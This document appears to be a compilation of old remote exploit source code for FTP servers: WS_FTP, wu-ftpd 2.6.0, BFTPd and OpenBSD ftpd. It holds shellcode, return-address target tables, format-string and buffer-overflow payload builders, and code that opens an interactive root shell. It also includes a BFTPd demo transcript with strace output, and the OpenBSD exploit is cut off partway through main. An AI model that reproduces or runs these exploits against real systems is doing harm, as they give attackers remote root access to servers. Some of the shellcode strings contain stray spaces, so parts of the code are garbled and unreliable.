const char* s1 = "quota exceeded; ";
char padding[SERV_BUF_EIP];
int padding_len = sizeof(padding) - (int)strlen(s1);
memset(padding, 'A', sizeof(padding));
int xpsz = (int)strlen(ALLO_STRING "\r\n") + padding_len + 4 + shellcode_len;
badbuf = new char[xpsz+1];
badbuf[xpsz] = 0;
int tmpidx = 0;
if (!add_bytes(badbuf, tmpidx, xpsz, ALLO_STRING "\r\n", (int)strlen(ALLO_STRING "\r\n")) ||
!add_bytes(badbuf, tmpidx, xpsz, padding, padding_len) ||
!add_bytes(badbuf, tmpidx, xpsz, ret_addr, 4) ||
!add_bytes(badbuf, tmpidx, xpsz, shellcode, shellcode_len) ||
tmpidx != xpsz)
{
msg("[-] This is a bug. Now you know\n");
__leave;
}
if (!create_file_for_addr(s, this_ptr + SERV_THIS_CMDBUF_OFFS + strlen(ALLO_STRING "\r\n")))
__leave;
if (send_cmd2(s, badbuf) < 0)
__leave;
ret = 1;
}
__finally
{
quite_you = 0;
if (shellcode)
delete shellcode;
if (badbuf)
delete badbuf;
}
return ret;
}
void show_help(char* pname)
{
msg("%s <ip> <port> <sip> <sport> [-u username] [-p userpass] [-a]\n", pname);
exit(1);
}
int main(int argc, char** argv)
{
msg("Ipswitch WS_FTP Server <= 4.0.2 ALLO exploit\n");
msg("(c)2004 Hugh Mann [email protected]\n");
WSADATA wsa;
if (WSAStartup(0x0202, &wsa))
return 1;
if (argc < 5)
show_help(argv[0]);
unsigned long ip = ntohl(inet_addr(argv[1]));
unsigned short port = (unsigned short)atoi(argv[2]);
unsigned long sip = ntohl(inet_addr(argv[3]));
unsigned short sport = (unsigned short)atoi(argv[4]);
const char* username = "anonymous";
const char* userpass = "Hugh Mann";
for (int i = 5; i < argc; i++)
{
if (!strcmp(argv[i], "-u") && i + 1 < argc)
{
username = argv[++i];
}
else if (!strcmp(argv[i], "-p") && i + 1 < argc)
{
userpass = argv[++i];
}
else if (!strcmp(argv[i], "-a"))
{
output_all = 1;
}
else
show_help(argv[0]);
}
if (!ip || !port || !sip || !sport)
show_help(argv[0]);
xuser user;
if (!user.init(ip, port, username, userpass))
return 0;
if (!user.exploit(sip, sport))
msg("[-] u n33d t0 s7uddy m0r3...\n");
else
msg("[+] Wait a few secs for a shell\n");
return 0;
}
// [2004-03-23]
21 wu-ftpd 2.6.0 Remote Root Exploit
/*
* (c) 2000 venglin / b0f
* http://b0f.freebsd.lublin.pl
*
* WUFTPD 2.6.0 REMOTE ROOT EXPLOIT (22/06/2000, updated: 05/08/2000)
*
* Idea and preliminary version of exploit by tf8
*
* Greetz: Lam3rZ, TESO, ADM, lcamtuf, karpio.
* Dedicated to ksm.
*
* **PRIVATE**DO*NOT*DISTRIBUTE**
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <arpa/inet.h>
#define repln if (getreply(0) < 0) return -1
#define replv if (getreply(1) < 0) return -1
#ifdef DEBUG
#define repl replv
#else
#define repl repln
#endif
char usage[] = "usage: bobek [-l login] [-o port] [-f retofs] [-s retlocofs]\n\t<-t type> <hostname>";
char recvbuf[BUFSIZ], sendbuf[BUFSIZ];
FILE *cin, *cout;
char linuxcode[]= /* Lam3rZ chroot() code */
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x 31\xdb"
"\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\x c0\x31"
"\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\x01\xb0\x 27\xcd"
"\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x 31\xdb"
"\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x 8d\x5e"
"\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x 46\x09"
"\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\x c8\x88"
"\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x 0c\x89"
"\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\x c0\x31"
"\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\x30\x62\x 69\x6e"
"\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e\x67\x 6c\x69"
"\x6e\x40\x6b\x6f\x63\x68\x61\x6d\x2e\x6b\x61\x73\x 69\x65"
"\x2e\x63\x6f\x6d";
char bsdcode[] = /* Lam3rZ chroot() code rewritten for FreeBSD by venglin */
"\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\x c0\x43"
"\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x 31\xc0"
"\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\x01\x53\x53\x b0\x88"
"\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x 80\x31"
"\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\x c9\x31"
"\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x 75\xf1"
"\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\x cd\x80"
"\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x 46\x07"
"\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x 56\x0c"
"\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x 53\x53"
"\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\x30\x62\x69\x 6e\x30"
"\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e\x67\x6c\x 69\x6e"
"\x40\x6b\x6f\x63\x68\x61\x6d\x2e\x6b\x61\x73\x69\x 65\x2e"
"\x63\x6f\x6d";
struct platforms
{
char *os;
char *version;
char *code;
int align;
int eipoff;
long ret;
long retloc;
int sleep;
};
struct platforms targ[] =
{
{ "FreeBSD 3.4-STABLE", "2.6.0-ports", bsdcode, 2, 1024, 0x80b1f10, 0xbfbfcc04, 0 },
{ "FreeBSD 5.0-CURRENT", "2.6.0-ports", bsdcode, 2, 1024, 0x80b1510, 0xbfbfec0c, 0 },
{ "FreeBSD 3.4-STABLE", "2.6.0-packages", bsdcode, 2, 1024, 0x80b1510, 0xbfbfe798, 0 },
{ "FreeBSD 3.4-STABLE", "2.6.0-venglin", bsdcode, 2, 1024, 0x807078c, 0xbfbfcc04, 0 },
{ "RedHat Linux 6.2", "2.6.0-RPM", linuxcode, 2, 1024, 0x80759e0, 0xbfffcf74, 0 },
{ "RedHat Linux 6.2", "2.6.0-RPM", linuxcode, 2, 1024, 0x80759e0, 0xbfffd074, 0 },
{ "RedHat Linux 6.2", "2.6.0-RPM", linuxcode, 2, 1024, 0x80759e0, 0xbfffcf84, 0 },
{ "RedHat Linux 6.2", "2.6.0-RPM", linuxcode, 2, 1024, 0x80759e0, 0xbfffd04c, 0 },
{ "RedHat Linux 6.2-SMP", "2.6.0-RPM", linuxcode, 2, 1024, 0x80759e0, 0xbfffd0e4, 0 },
{ NULL, NULL, NULL, 0, 0, 0, 0 }
};
long getip(name)
char *name;
{
struct hostent *hp;
long ip;
extern int h_errno;
if ((ip = inet_addr(name)) < 0)
{
if (!(hp = gethostbyname(name)))
{
fprintf(stderr, "gethostbyname(): %s\n",
strerror(h_errno));
exit(1);
}
memcpy(&ip, (hp->h_addr), 4);
}
return ip;
}
int connecttoftp(host, port)
char *host;
int port;
{
int sockfd;
struct sockaddr_in cli;
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_addr.s_addr=getip(host);
cli.sin_port = htons(port);
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
return -1;
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
{
perror("connect");
close(sockfd);
return -1;
}
cin = fdopen(sockfd, "r");
cout = fdopen(sockfd, "w");
if (!cin || !cout)
{
close(sockfd);
return -1;
}
return sockfd;
}
int command(const char *fmt, ...)
{
char buf1[BUFSIZ], buf2[BUFSIZ*2], *p, *q;
va_list args;
if (!cout)
return -1;
bzero(buf1, BUFSIZ);
bzero(buf2, BUFSIZ*2);
va_start(args, fmt);
vsnprintf(buf1, BUFSIZ, fmt, args);
va_end(args);
for (p=buf1,q=buf2;*p;p++,q++)
{
if (*p == '\xff')
{
*q++ = '\xff';
*q = '\xff';
}
else
*q = *p;
}
fprintf(cout, "%s", buf2);
#ifdef DEBUG
fprintf(stderr, "--> ");
fprintf(stderr, "%s", buf2);
fputc('\n', stderr);
#endif
fputs("\r\n", cout);
(void)fflush(cout);
return 0;
}
int getreply(v)
int v;
{
if (!(fgets(recvbuf, BUFSIZ, cin)))
return -1;
if (v)
fprintf(stderr, "<-- %s", recvbuf);
return 0;
}
int logintoftp(login, passwd)
char *login, *passwd;
{
do
repl;
while (strncmp(recvbuf, "220 ", 4));
if ((command("USER %s", login)) < 0)
return -1;
repl;
if (strncmp(recvbuf, "331", 3))
{
puts(recvbuf);
return -1;
}
if ((command("PASS %s", passwd) < 0))
return -1;
do
repl;
while (strncmp(recvbuf, "230 ", 4));
return 0;
}
int checkvuln(void)
{
command("SITE EXEC %%p");
repl;
if(strncmp(recvbuf, "200-", 4))
return -1;
if(strncmp(recvbuf+4, "0x", 2))
return -1;
repl;
return 0;
}
int findeip(eipoff, align)
int eipoff, align;
{
int i, j, off;
char *p1;
char eip1[10], eip2[10];
for (i=eipoff;;i+=8)
{
fprintf(stderr, "at offset %d\n", i);
strcpy(sendbuf, "SITE EXEC ");
for (j=0;j<align;j++) strcat(sendbuf, "a");
strcat(sendbuf, "abcd");
for (j=0;j<eipoff/8;j++) strcat(sendbuf, "%%.f");
for (j=0;j<(i-eipoff)/8;j++) strcat(sendbuf, "%%d%%d");
strcat(sendbuf, "|%%.8x|%%.8x");
if (command(sendbuf) < 0)
return -1;
repl;
if (!(p1 = strchr(recvbuf, '|')))
return -1;
strncpy(eip1, p1+1, 8);
strncpy(eip2, p1+10, 8);
eip1[8] = eip2[8] = '\0';
if (!(strcmp(eip1, "64636261")))
{
off = i;
break;
}
if (!(strcmp(eip2, "64636261")))
{
off = i + 4;
break;
}
repl;
}
repl;
return off;
}
char *putshell(type)
int type;
{
static char buf[400];
int noplen;
char *code = targ[type].code;
noplen = sizeof(buf) - strlen(code) - 2;
memset(buf, 0x90, noplen);
buf[noplen+1] = '\0';
strcat(buf, code);
return buf;
}
int overwrite(ptr, off, align, retloc, eipoff)
long ptr, retloc;
int off, align, eipoff;
{
int i, size = 0;
char buf[100];
fprintf(stderr, "RET: %p, RET location: %p,"
" RET location offset on stack: %d\n",
(void *)ptr, (void *)retloc, off);
if (off >= 12)
{
strcpy(sendbuf, "SITE EXEC ");
for (i=0;i<eipoff/8;i++) strcat(sendbuf, "%%.f");
for (i=0;i<(off-eipoff-8)/8;i++) strcat(sendbuf, "%%d%%d");
if (((off-eipoff-8) % 8) != 0) strcat(sendbuf, "%%d%%d");
if (command(sendbuf) < 0)
return -1;
repl;
size = strlen(recvbuf+4) - 2;
repl;
}
fprintf(stderr, "Reply size: %d, New RET: %p\n", size,
(void *)(ptr-size));
strcpy(sendbuf, "SITE EXEC ");
for (i=0;i<align;i++) strcat(sendbuf, "a");
sprintf(buf, "%c%c%c%c", ((int)retloc & 0xff),
(((int)retloc & 0xff00) >> 8),
(((int)retloc & 0xff0000) >> 16),
(((int)retloc & 0xff000000) >> 24));
strcat(sendbuf, buf);
for (i=0;i<eipoff/8;i++) strcat(sendbuf, "%%.f");
for (i=0;i<(off-eipoff-8)/8;i++) strcat(sendbuf, "%%d%%d");
if (((off-eipoff-8) % 8) != 0) strcat(sendbuf, "%%d%%d");
strcat(sendbuf, "%%.");
sprintf(buf, "%d", (int)ptr-size);
strcat(sendbuf, buf);
strcat(sendbuf, "d%%n");
if (command(sendbuf) < 0)
return -1;
return 0;
}
int sh(sockfd)
int sockfd;
{
char buf[BUFSIZ];
int c;
fd_set rf, drugi;
char cmd[] = "uname -a ; pwd ; id\n";
FD_ZERO(&rf);
FD_SET(0, &rf);
FD_SET(sockfd, &rf);
write(sockfd, cmd, strlen(cmd));
while (1)
{
bzero(buf, BUFSIZ);
memcpy (&drugi, &rf, sizeof(rf));
select(sockfd+1, &drugi, NULL, NULL, NULL);
if (FD_ISSET(0, &drugi))
{
c = read(0, buf, BUFSIZ);
send(sockfd, buf, c, 0x4);
}
if (FD_ISSET(sockfd, &drugi))
{
c = read(sockfd, buf, BUFSIZ);
if (c<0) return 0;
write(1,buf,c);
}
}
}
int main(argc, argv)
int argc;
char **argv;
{
extern int optind, opterr;
extern char *optarg;
int ch, type, port, eipoff, fd, retofs, retlocofs, align, i, retoff;
long ret, retloc;
char login[BUFSIZ], password[BUFSIZ];
opterr = retofs = retlocofs = 0;
strcpy(login, "ftp");
type = -1;
port = 21;
while ((ch = getopt(argc, argv, "l:f:s:t:o")) != -1)
switch((char)ch)
{
case 'l':
strcpy(login, optarg);
break;
case 't':
type = atoi(optarg);
break;
case 'o':
port = atoi(optarg);
break;
case 'f':
retofs = atoi(optarg);
break;
case 's':
retlocofs = atoi(optarg);
break;
case '?':
default:
puts(usage);
exit(0);
}
argc -= optind;
argv += optind;
fprintf(stderr, "PanBobek v1.1 by [email protected]\n\n");
if (type < 0)
{
fprintf(stderr, "Please select platform:\n");
for (i=0;targ[i].os;i++)
{
fprintf(stderr, "\t-t %d : %s %s (%p / %p)\n", i,
targ[i].os, targ[i].version,
(void *)targ[i].ret,
(void *)targ[i].retloc);
}
exit(0);
}
fprintf(stderr, "Selected platform: %s with WUFTPD %s\n\n",
targ[type].os, targ[type].version);
eipoff = targ[type].eipoff;
align = targ[type].align;
ret = targ[type].ret;
retloc = targ[type].retloc;
retloc += retlocofs;
ret += retofs;
if (argc != 1)
{
puts(usage);
exit(0);
}
strcpy(password, putshell(type));
if ((fd = connecttoftp(*argv, port)) < 0)
{
(void)fprintf(stderr, "Connection to %s failed.\n", *argv);
exit(1);
}
(void)fprintf(stderr, "Connected to %s. Trying to log in.\n", *argv);
if (logintoftp(login, password) < 0)
{
(void)fprintf(stderr, "Logging in to %s (%s) failed.\n",
*argv, login);
exit(1);
}
(void)fprintf(stderr, "Logged in as %s. Checking vulnerability.\n",
login);
sleep(targ[type].sleep);
if (checkvuln() < 0)
{
(void)fprintf(stderr, "Sorry, this version isn't"
" vulnerable or uses internal vsnprintf().\n");
exit(1);
}
(void)fprintf(stderr, "Ok, trying to find offset (initial: %d)\n",
eipoff);
if ((retoff = findeip(eipoff, align)) < 0)
{
(void)fprintf(stderr, "\nError finding offset. Adjust"
" align.\n");
exit(1);
}
if (overwrite(ret, retoff, align, retloc, eipoff) < 0)
{
(void)fprintf(stderr, "Error overwriting RET addr.\n");
exit(1);
}
fprintf(stderr, "Wait up to few minutes for reply. It depends on "
"victim's CPU speed.\nEnjoy your shell.\n");
sh(fd);
exit(0);
}
// [2000-11-21]
21 BFTPd vsprintf() Format Strings Exploit
*
* Copyright (c) 2000 - Security.is
*
* The following material may be freely redistributed, provided
* that the code or the disclaimer have not been partly removed,
* altered or modified in any way. The material is the property
* of security.is. You are allowed to adopt the represented code
* in your programs, given that you give credits where it's due.
*
* A no-name ftp-server has a serious bug which leads to remote root.
* Anyway, we exploit vsprintf() via format-string.
*
* Discovered/coded by: DiGiT - [email protected]
* Greets: security.is, ADM
* note: Coded during security.is weekend ;>
*
* Run like: (./bftpexp ; cat) | nc bftpd.victim.com 21
* offset is optional and is arg1
*
*/
#include <stdio.h>
char shellcode[] =
"\x31\xc0\x31\xdb\x04\x0b\xcd\x80\x31\xc0\x40\x40\x cd\x80\x85"
"\xc0\x75\x28\x89\xd9\x31\xc0\x41\x04\x3f\xcd\x80\x 31\xc0\x04"
"\x3f\x41\xeb\x1f\x31\xc0\x5f\x89\x7f\x08\x88\x47\x 07\x89\x47"
"\x0c\x89\xfb\x8d\x4f\x08\x8d\x57\x0c\x04\x0b\xcd\x 80\x31\xc0"
"\x31\xdb\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
#define ADDR 0xbffff83c
int main(int argc, char *argv[])
{
char lenbuf[1024],nopbuf[256], addrbuf[32], buf[256];
int offset=0,length, nopcount=100,i;
long nop_addr = ADDR;
if(argc > 1)
offset = atoi(argv[1]);
memset (nopbuf, '\x90', nopcount);
nop_addr = nop_addr + offset;
strcpy(buf, nopbuf);
strcat(buf, shellcode);
length=1024-strlen(shellcode)-nopcount+4-14;
strcat(buf, "%.");
sprintf(lenbuf, "%dd", length);
strcat(buf, lenbuf);
sprintf(addrbuf, "%c%c%c%c",
(unsigned char) ((nop_addr >> 0) & 0xff),
(unsigned char) ((nop_addr >> 8) & 0xff),
(unsigned char) ((nop_addr >> 16) & 0xff),
(unsigned char) ((nop_addr >> 24) & 0xff));
for(i = 0 ; i < 4 ; i++)
strcat(buf, addrbuf);
fprintf(stderr, "Bftpd remote exploit, by DiGiT\n");
fprintf(stderr, "Using Address = 0x%x\n", nop_addr);
printf("%s\n", buf);
return 0;
}
// [2000-11-29]
21 BFTPd 1.0.12 Remote Exploit
/*
Creates a filname to exploit the bug in bftpd 1.0.12
Create the file, cwd in the shell directory and nlist the file directory.
Coded by korty <[email protected]>
*/
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <fcntl.h>
#define LEN 205
int main (int argc, char **argv)
{
char buf[LEN + 12];
int ret = 0xbffffa80;
int *p;
int fp;
char code[]=
/*
* Linux/x86
*
* toupper() evasion, standard execve() /bin/sh (used eg. in various
* imapd exploits). Goes through a loop adding 0x20 to the
* (/bin/sh -= 0x20) string (ie. yields /bin/sh after addition).
*/
/* main: */
"\xeb\x29" /* jmp callz */
/* start: */
"\x5e" /* popl %esi */
"\x29\xc9" /* subl %ecx, %ecx */
"\x89\xf3" /* movl %esi, %ebx */
"\x89\x5e\x08" /* movl %ebx, 0x08(%esi) */
"\xb1\x07" /* movb $0x07, %cl */
/* loopz: */
"\x80\x03\x20" /* addb $0x20, (%ebx) */
"\x43" /* incl %ebx */
"\xe0\xfa" /* loopne loopz */
"\x29\xc0" /* subl %eax, %eax */
"\x88\x46\x07" /* movb %al, 0x07(%esi) */
"\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
"\xb0\x0b" /* movb $0x0b, %al */
"\x87\xf3" /* xchgl %esi, %ebx */
"\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */
"\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */
"\xcd\x80" /* int $0x80 */
"\x29\xc0" /* subl %eax, %eax */
"\x40" /* incl %eax */
"\xcd\x80" /* int $0x80 */
/* callz: */
"\xe8\xd2\xff\xff\xff" /* call start */
"\x0f\x42\x49\x4e\x0f\x53\x48"; /* /bin/sh -= 0x20 */
if (argc > 1) {
ret += atoi(argv[1]);
fprintf(stderr, "Using ret %#010x\n", ret);
}
memset(buf, '\x90', LEN);
memcpy(buf + LEN - strlen(code), code, strlen(code));
p = (int *) (buf + LEN);
*p++ = ret;
*p++ = ret;
*p = 0;
fp = open(buf, O_CREAT);
if(fp < 0) perror("buf");
close(fp);
}
/*
-- BEGIN list.c --
#include <stdio.h>
int main()
{
#define USER "cb"
#define PASS "PasSwoRd"
#define PORT "port 127,0,0,1,4,4" // Data on the port 1028 with the addr 127.0.0.1
#define CWD "cwd longfile"
#define LIST "list"
printf("user %s\n", USER);
sleep(1);
printf("pass %s\n", PASS);
sleep(1);
printf("%s\n", PORT);
sleep(1);
printf("%s\n", CWD);
sleep(1);
printf("%s\n", LIST);
}
-- END list.c --
A) DEMO
tshaw:~/longfile$ gcc -o exploit exploit.c
tshaw:~/longfile$ ls
exploit* exploit.c list.c
tshaw:~/longfile$ ls
exploit* exploit.c list.c
tshaw:~/longfile$ ./exploit
tshaw:~/longfile$ ls
exploit*
exploit.c
list.c
\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220\220\220\220\3 13)^)\311\211\323\211^\b\221\a\200\003\ C
\300\332)\300\210F\a\211F\f\220\v\203\323\211K\b\2 11S\f\311\200)\300\@\311\200\310\322\333
\333\333\013BIN\013SH\200\332\333\233\200\332\333\ 233*
tshaw:~/longfile$
tshaw:~/longfile$ gcc -o list list.c
tshaw:~/longfile$ nc -l -p 1028 &
[1] 29973
tshaw:~/longfile$
tshaw:~/longfile$ (./list ; cat) | nc localhost 21
220 bftpd 1.0.12 at 127.0.0.1 ready.
331 Password please.
230 User logged in.
200 PORT 127.0.0.1:1028 OK
250 OK
150 Data connection established.
drwxr-xr-x 2 1000 100 4096 Dec 8 04:06 .
drwxr-xr-x 55 1000 100 4096 Dec 8 04:02 ..
-rw-r--r-- 1 1000 100 323 Dec 8 04:06 list.c
-rwxr-xr-x 1 1000 100 11931 Dec 8 04:06 list
-rw-r--r-- 1 1000 100 2178 Dec 8 03:54 exploit.c
-rwxr-xr-x 1 1000 100 12861 Dec 8 03:56 exploit
-r-xr--r-- 1 1000 100 0 Dec 8 03:56 릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱� �릱릱릱
릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱� �릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱� ��릱릱릱릱릱릱릱릱릱릱릱릱릱
릱릱릱릱릱릱릱릱?^)??? C猩)핂F덯
?
뉡뜊S
?)??脘BINSH€????
[1]+ Done nc -l -p 1028
tshaw:~/longfile$
B) STRACE OUTPUT
tshaw:~# ps -aef |grep bftpd
cb 30128 62 0 Dec04 ? 00:00:00 bftpd
root 30136 30024 0 Dec04 ttyqa 00:00:00 grep bftpd
tshaw:~# strace -p 30128
read(0, "\n", 4096) = 1
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 4
setsockopt(4, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
setsockopt(4, SOL_SOCKET, SO_SNDBUF, [65536], 4) = 0
bind(4, {sin_family=AF_INET, sin_port=htons(0), sin_addr=inet_addr("127.0.0.1")}}, 16) = 0
connect(4, {sin_family=AF_INET, sin_port=htons(1028), sin_addr=inet_addr("127.0.0.1")}}, 16) = 0
write(2, "150 Data connection established."..., 34) = 34
open("/dev/null", O_RDONLY|O_NONBLOCK|0x10000) = -1 ENOENT (No such file or directory)
stat(".", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
open(".", O_RDONLY|O_NONBLOCK|0x10000) = 5
fstat(5, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
fcntl(5, F_SETFD, FD_CLOEXEC) = 0
brk(0x8052000) = 0x8052000
getdents(5, /* 7 entries */, 3933) = 328
stat("./.", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
send(4, "drwxr-xr-x 2 1000 100 "..., 58, 0) = 58
stat("./..", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
send(4, "drwxr-xr-x 55 1000 100 "..., 59, 0) = 59
stat("./list.c", {st_mode=S_IFREG|0644, st_size=323, ...}) = 0
send(4, "-rw-r--r-- 1 1000 100 "..., 63, 0) = 63
stat("./list", {st_mode=S_IFREG|0755, st_size=11931, ...}) = 0
send(4, "-rwxr-xr-x 1 1000 100 "..., 61, 0) = 61
stat("./exploit.c", {st_mode=S_IFREG|0644, st_size=2178, ...}) = 0
send(4, "-rw-r--r-- 1 1000 100 "..., 66, 0) = 66
stat("./exploit", {st_mode=S_IFREG|0755, st_size=12861, ...}) = 0
send(4, "-rwxr-xr-x 1 1000 100 "..., 64, 0) = 64
stat("./릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱� �릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱� ��릱릱릱릱릱릱릱릱릱릱릱?
릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱� �릱릱릱릱릱릱릱릱릱릱릱릱먮)^)??? C猩)핂F덯
?
뉡뜊S
?)??脘BINSH€????, {st_mode=S_IFREG|S_ISUID|0544, st_size=0, ...}) = 0
send(4, "-r-xr--r-- 1 1000 100 "..., 270, 0) = 270
execve("/bin/sh", ["/bin/sh"], [/* 0 vars */]) = -1 ENOENT (No such file or directory)
_exit(-1073743151) = ?
tshaw:~#
*/
// [2000-12-11]
21 OpenBSD 2.6 / 2.7ftpd Remote Exploit
/*
h0h0h0 0-day k0d3z
Exploit by Scrippie, help by dvorak and jimjones
greets to sk8
Not fully developt exploit but it works most of the time ;)
Things to add:
- automatic writeable directory finding
- syn-scan option to do mass-scanning
- worm capabilities? (should be done seperatly using the -C option
11/13/2000
*/
#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
void usage(char *program);
char *strcreat(char *, char *, int);
char *longToChar(unsigned long);
char *xrealloc(void *, size_t);
void xfree(char **ptr);
char *xmalloc(size_t);
int xconnect(char *host, u_short port);
void xsend(int fd, char *buf);
void xsendftpcmd(int fd, char *command, char *param);
void xrecieveall(int fd, char *buf, int size);
void xrecieve(int fd, char *buf, int size);
void ftp_login(int fd, char *user, char *password);
void exploit(int fd);
int verbose = 0;
/*
Written by dvorak, garbled up by "Smegma" with a word xor 0xaabb mask
to get rid of dots and slashes.
*/
char heavenlycode[] =
"\x31\xc0\x89\xc1\x80\xc1\x02\x51\x50\x04\x5a\x50\x cd\x80"
"\xeb\x10\x5e\x31\xc9\xb1\x4a\x66\x81\x36\xbb\xaa\x 46\x46\xe2\xf7\xeb\x05\xe8\xeb\xff\xff\xff\xff\xff \xff\x50\xcf\xe5\x9b\x7b\xf
a\xbf\xbd\xeb\x67\x3b\xfc\x8a\x6a\x33\xec\xba\xae\ x33\xfa\x76\x2a\x8a\x6a\xeb\x22\xfd\xb5\x36\xf4\xa 5\xf9\xbf\xaf\xeb\x67\x3b\x2
3\x7a\xfc\x8a\x6a\xbf\x97\xeb\x67\x3b\xfb\x8a\x6a\ xbf\xa4\xf3\xfa\x76\x2a\x36\xf4\xb9\xf9\x8a\x6a\xb f\xa6\xeb\x67\x3b\x27\xe5\xb
4\xe8\x9b\x7b\xae\x86\xfa\x76\x2a\x8a\x6a\xeb\x22\ xfd\x8d\x36\xf4\x93\xf9\x36\xf4\x9b\x23\xe5\x82\x3 2\xec\x97\xf9\xbf\x91\xeb\x6
7\x3b\x42\x2d\x55\x44\x55\xfa\xeb\x95\x84\x94\x84\ x95\x85\x95\x84\x94\x84\x95\x85\x95\x84\x94\x84\x9 5\x85\x95\x84\x94\x84\x95\x8
5\x95\x84\x94\x84\x95\xeb\x94\xc8\xd2\xc4\x94\xd9\ xd3";
char user[255] = "anonymous";
char pass[255] = "[email protected]";
char write_dir[PATH_MAX] = "/";
int ftpport = 21;
unsigned long int ret_addr = 0;
#define CMD_LOCAL 0
#define CMD_REMOTE 1
int command_type = -1;
char *command = NULL;
struct typeT {
char *name;
unsigned long int ret_addr;
};
#define NUM_TYPES 2
struct typeT types[NUM_TYPES] = {
"OpenBSD 2.6", 0xdfbfd0ac,
"OpenBSD 2.7", 0xdfbfd0ac};
void
usage(char *program)
{
int i;
fprintf(stderr,
"\nUsage: %s [-h host] [-f port] [-u user] [-p pass] [-d directory] [-t type]\n\t\t[-r retaddr] [-c command]
[-C command]\n\n"
"Directory should be an absolute path, writable by the user.\n"
"The argument of -c will be executed on the remote host\n"
"while the argument of -C will be executed on the local\n"
"with its filedescriptors connected to the remote host\n"
"Valid types:\n",
program);
for (i = 0; i < NUM_TYPES; i++) {
printf("%d : %s\n", i, types[i].name);
}
exit(-1);
}
main(int argc, char **argv)
{
unsigned int i;
int opt, fd;
unsigned int type = 0;
char *hostname = "localhost";
if (argc < 2)
usage(argv[0]);
while ((opt = getopt(argc, argv, "h:r:u:f:d:t:vp:c:C:")) != -1) {
switch (opt) {
case 'h':
hostname = optarg;
break;
case 'C':
command = optarg;
command_type = CMD_LOCAL;
break;
case 'c':
command = optarg;
command_type = CMD_REMOTE;
break;
case 'r':
ret_addr = strtoul(optarg, NULL, 0);
break;
case 'v':
verbose++;
break;
case 'f':
if (!(ftpport = atoi(optarg))) {
fprintf(stderr, "Invalid destination port - %s\n", optarg);
exit(-1);
}
exit(-1);
break;
case 'u':
strncpy(user, optarg, sizeof(user) - 1);
user[sizeof(user) - 1] = 0x00;
break;
case 'p':
strncpy(pass, optarg, sizeof(pass) - 1);
pass[sizeof(pass) - 1] = 0x00;
break;
case 'd':
strncpy(write_dir, optarg, sizeof(write_dir) - 1);
write_dir[sizeof(write_dir) - 1] = 0x00;
if ((write_dir[0] != '/'))
usage(argv[0]);
if ((write_dir[strlen(write_dir) - 1] != '/'))
strncat(write_dir, "/", sizeof(write_dir) - 1);
break;
case 't':
type = atoi(optarg);
if (type > NUM_TYPES)
usage(argv[0]);
break;
default:
usage(argv[0]);
}
}
if (ret_addr == 0)
ret_addr = types[type].ret_addr;
if ((fd = xconnect(hostname, ftpport)) == -1)
exit(-1);
else
